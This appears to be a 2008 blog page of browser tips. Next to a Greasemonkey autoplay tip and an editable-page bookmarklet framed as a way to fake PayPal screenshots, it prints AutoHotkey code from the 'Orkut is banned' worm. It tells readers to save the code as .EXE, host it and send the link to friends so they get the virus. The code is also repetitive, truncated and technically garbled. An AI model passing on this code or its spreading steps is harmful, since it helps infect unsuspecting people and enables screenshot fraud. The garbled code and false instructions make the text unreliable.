Prevent youtube videos from playing automatically in firefox
0 comments Posted by DILLU... at Friday, November 07, 2008All u need is firefox browser and "greasemonkey" .
How to use :
- Install greasemonkey and then install the script
.
- Greasemonkey icon appears at the right bottom of the browser and right click on the icon and click 'Manage user scripts'.
- Click on the 'youtube prevent autoplay' on the left side and now in the 'included pages' block, click on add and click ok.
- The 'add' button enable the script to install on the current site.
Edit any website with a single line of code
0 comments Posted by DILLU... at Monday, October 20, 2008Have you ever thought of editing the web pages of another website..!! This simple code makes it possible.
But,you can’t actually edit the actual web page but you can edit the page as you see it on your screen.
This is one of the ways scammers create fake screenshots, fake Adsense & affiliate earnings and even fake Paypal transactions.
All you need to do is visit the site you want to edit, paste the code below into your web browser address bar (tested in Firefox & IE7) and hit the Enter button.
Then simply select a portion of text on the page and start editing.
CODE :
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Labels: scripts
Want to know how to automatically redirect your visitors to the new web page??...
Its very simple.Just add the following HTML tag :
Labels: scripts
"Orkut is banned you fool, MUHAHAHA!!" With a window ORKUT IS BANNED... I think u have seen this messageon ur frnds computer or u have been experienced it...
I guess u have been in a dilemma y dis mesg pops up wenever u try to open mozilla firefox or sometimes wen u try to login in orkut...This is nothing but a worm named as w32.USB worm, it spreads in ur comp wen u insert a pen drive into USB port & this w32.USB is get into ur PC or by clicking any link which contains this worm....
Here is the code which abandons or bans u from using mozilla firefox and orkut...
ifwinactive ahk_class IFrame
{
ControlGetText,ed,edit1,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{.......}
}
You have to copy the above code & paste in notepad & save with an extension .EXE
Now the main work starts u have to upload the exe file into hosting services like www.freeweb7.com...scrap that link to ur frnds & if they click on it they ll get dat virus & they ll be banned ...
Labels: scripts